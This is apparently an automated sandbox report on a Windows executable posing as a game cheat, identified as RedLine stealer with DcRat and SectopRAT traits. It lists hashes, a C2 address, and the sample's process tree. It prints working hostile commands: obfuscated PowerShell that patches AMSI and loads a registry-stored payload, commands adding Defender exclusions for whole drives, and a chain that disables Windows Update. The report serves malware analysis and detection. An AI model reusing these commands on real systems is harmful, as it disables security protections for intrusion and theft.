Analysis
max time kernel: 150s
max time network: 148s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06-11-2024 11:06
Static task: static1
Behavioral task: behavioral1
Sample: 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe
Resource: win7-20240903-en
Behavioral task: behavioral2
Sample: 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe
Resource: win10v2004-20241007-en
General
Target: 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe
Size: 7.3MB
MD5: 06293c3726a8b6029225668dcfb8c7e8
SHA1: 1db3a38e9cff8b2aec7b73668e6768002c2bddbf
SHA256: ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c
SHA512: 33a80c1dec409c83d82cb9e1149a90ca11024d726b58b83035ab149b22989c4406cacab57adf6da5ce0d49cb393d4c2fcf58cd2491d0b0c0c5382e06bc35f376
SSDEEP: 196608:68waBBQvE8waBBQv36od0Ntiq0rG6MvF:68waB+88waB+/jwtivrr
Malware Config
Extracted
Family: redline
Botnet: Lucifer
C2: 162.55.169.73:49194
Signatures
DcRat
DarkCrystal (DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Dcrat family
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload 2 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\explorer.exe | family_redline
behavioral2/memory/1500-13-0x0000000000C70000-0x0000000000C8E000-memory.dmp | family_redline
Redline family
SectopRAT payload 2 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\explorer.exe | family_sectoprat
behavioral2/memory/1500-13-0x0000000000C70000-0x0000000000C8E000-memory.dmp | family_sectoprat
Sectoprat family
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
description | pid | process | target process
PID 2500 created 616 | 2500 | powershell.EXE | winlogon.exe
Processes:
pid | process
2500 | powershell.EXE
3084 | powershell.EXE
1180 | powershell.exe
2284 | powershell.exe
1620 | powershell.exe
Drops file in Drivers directory 4 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
Possible privilege escalation attempt 8 IoCs
Processes:
pid | process
1092 | takeown.exe
3996 | icacls.exe
1208 | takeown.exe
4016 | icacls.exe
5088 | takeown.exe
3284 | icacls.exe
2608 | takeown.exe
3880 | icacls.exe
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | windowshost.exe
Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | WScript.exe
Executes dropped EXE 7 IoCs
Processes:
pid | process
1500 | explorer.exe
1640 | svchost.exe
1532 | windowshost.exe
2012 | svchost.exe
4440 | cominto.exe
1328 | updater.exe
1424 | updater.exe
Modifies file permissions 1 TTPs 8 IoCs
Processes:
pid | process
2608 | takeown.exe
3880 | icacls.exe
1092 | takeown.exe
3996 | icacls.exe
1208 | takeown.exe
4016 | icacls.exe
5088 | takeown.exe
3284 | icacls.exe
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
Power Settings 1 TTPs 20 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
pid | process
3296 | powercfg.exe
3600 | powercfg.exe
4248 | powercfg.exe
3016 | powercfg.exe
3624 | cmd.exe
2248 | powercfg.exe
880 | powercfg.exe
228 | powercfg.exe
4840 | powercfg.exe
2736 | powercfg.exe
3056 | powercfg.exe
4156 | powercfg.exe
1432 | powercfg.exe
2212 | powercfg.exe
2400 | powercfg.exe
1076 | powercfg.exe
380 | cmd.exe
1472 | cmd.exe
4036 | powercfg.exe
4100 | cmd.exe
Drops file in System32 directory 11 IoCs
Processes:
description | ioc | process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | svchost.exe
Suspicious use of SetThreadContext 5 IoCs
Processes:
description | pid | process | target process
PID 4308 set thread context of 4808 | 4308 | conhost.exe | conhost.exe
PID 4340 set thread context of 836 | 4340 | conhost.exe | conhost.exe
PID 2500 set thread context of 4668 | 2500 | powershell.EXE | dllhost.exe
PID 4168 set thread context of 2492 | 4168 | conhost.exe | conhost.exe
PID 1288 set thread context of 2500 | 1288 | conhost.exe | conhost.exe
Drops file in Windows directory 8 IoCs
Processes:
description | ioc | process
File created | C:\Windows\Tasks\dialersvc64.job | conhost.exe
File opened for modification | C:\Windows\Tasks\dialersvc64.job | conhost.exe
File created | C:\Windows\Tasks\dialersvc32.job | conhost.exe
File opened for modification | C:\Windows\Tasks\dialersvc32.job | conhost.exe
File created | C:\Windows\Tasks\dialersvc64.job | conhost.exe
File opened for modification | C:\Windows\Tasks\dialersvc64.job | conhost.exe
File created | C:\Windows\Tasks\dialersvc32.job | conhost.exe
File opened for modification | C:\Windows\Tasks\dialersvc32.job | conhost.exe
Launches sc.exe 60 IoCs
Sc.exe is a Windows utility to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | windowshost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | explorer.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.EXE
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 1 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings | windowshost.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
4556 | schtasks.exe
4256 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
pid | process
2332 | Conhost.exe
4516 | Conhost.exe
4608 | Conhost.exe
3392 | Conhost.exe
3936 | Conhost.exe
4848 | Conhost.exe
464 | Conhost.exe
1608 | Conhost.exe
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid | process
3432 | Explorer.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:316 -
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5ea441e2-6fb5-4e6a-9501-c34b8879db7e}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4668
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:428
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1120
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2724
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:vVkefQIUvQwC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$AAQFOfJxLMpQUK,[Parameter(Position=1)][Type]$iCwjxecoMc)$jOfnizMJkQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$jOfnizMJkQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$AAQFOfJxLMpQUK).SetImplementationFlags('Runtime,Managed');$jOfnizMJkQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$iCwjxecoMc,$AAQFOfJxLMpQUK).SetImplementationFlags('Runtime,Managed');Write-Output $jOfnizMJkQb.CreateType();}$RWdfJfqcSOqwl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$XtOHrAsMhQVPCC=$RWdfJfqcSOqwl.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RxQMonzJTZYvuAJuZlf=vVkefQIUvQwC @([String])([IntPtr]);$lIVeqidCFnkSzDFvrGZuwQ=vVkefQIUvQwC 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jhOyDvGUFNp=$RWdfJfqcSOqwl.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$GIrXKKDTouyojI=$XtOHrAsMhQVPCC.Invoke($Null,@([Object]$jhOyDvGUFNp,[Object]('Load'+'LibraryA')));$KLaxLqgQheshZqDrx=$XtOHrAsMhQVPCC.Invoke($Null,@([Object]$jhOyDvGUFNp,[Object]('Vir'+'tual'+'Pro'+'tect')));$ldVmiTg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GIrXKKDTouyojI,$RxQMonzJTZYvuAJuZlf).Invoke('a'+'m'+'si.dll');$atXGZzrVcbonKTxog=$XtOHrAsMhQVPCC.Invoke($Null,@([Object]$ldVmiTg,[Object]('Ams'+'iSc'+'an'+'Buffer')));$hZEDmUcvGq=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KLaxLqgQheshZqDrx,$lIVeqidCFnkSzDFvrGZuwQ).Invoke($atXGZzrVcbonKTxog,[uint32]8,4,[ref]$hZEDmUcvGq);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$atXGZzrVcbonKTxog,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KLaxLqgQheshZqDrx,$lIVeqidCFnkSzDFvrGZuwQ).Invoke($atXGZzrVcbonKTxog,[uint32]8,0x20,[ref]$hZEDmUcvGq);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3084
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3504
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YeocFvTjtgid{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vzvlvLjQKVLmCw,[Parameter(Position=1)][Type]$LgmylDxtgV)$hUjRxOTTbMc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$hUjRxOTTbMc.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$vzvlvLjQKVLmCw).SetImplementationFlags('Runtime,Managed');$hUjRxOTTbMc.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LgmylDxtgV,$vzvlvLjQKVLmCw).SetImplementationFlags('Runtime,Managed');Write-Output $hUjRxOTTbMc.CreateType();}$zgsSIaYIUXdHV=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$ghIXlKeIEmhFWZ=$zgsSIaYIUXdHV.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PFuejJVpaSVwPFaeurN=YeocFvTjtgid @([String])([IntPtr]);$GMAvUbPAXGggWCCVDeoDuq=YeocFvTjtgid 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$HVecakmUUWL=$zgsSIaYIUXdHV.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$kizSwqqfCWLZrt=$ghIXlKeIEmhFWZ.Invoke($Null,@([Object]$HVecakmUUWL,[Object]('Load'+'LibraryA')));$QRZIjIYJmupCrAEym=$ghIXlKeIEmhFWZ.Invoke($Null,@([Object]$HVecakmUUWL,[Object]('Vir'+'tual'+'Pro'+'tect')));$VSOiJlE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kizSwqqfCWLZrt,$PFuejJVpaSVwPFaeurN).Invoke('a'+'m'+'si.dll');$hAQzEHSkdjoheqKbZ=$ghIXlKeIEmhFWZ.Invoke($Null,@([Object]$VSOiJlE,[Object]('Ams'+'iSc'+'an'+'Buffer')));$wBHwWyrcrB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QRZIjIYJmupCrAEym,$GMAvUbPAXGggWCCVDeoDuq).Invoke($hAQzEHSkdjoheqKbZ,[uint32]8,4,[ref]$wBHwWyrcrB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hAQzEHSkdjoheqKbZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QRZIjIYJmupCrAEym,$GMAvUbPAXGggWCCVDeoDuq).Invoke($hAQzEHSkdjoheqKbZ,[uint32]8,0x20,[ref]$wBHwWyrcrB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1128
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1148
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1168
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1300
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1312
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1336
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1392
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1440
C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2296
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1572
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1580
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1596
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1708
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1744
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1796
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1812
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2020
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2040
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1236
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1404
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1924
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2116
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2232
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2428
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2472
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2480
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2544
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2560
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2644
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2684
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2692
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2956
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2708
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3160
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3400
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3432
C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe
"C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe"
2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1892
C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"
3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:760
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"
4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1180
C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3508
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2284
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
C:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe
3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4908
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Users\Admin\AppData\Local\Temp\svchost.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1640
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
5⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4340
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="6⤵
- Suspicious use of WriteProcessMemory
PID:3596
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change 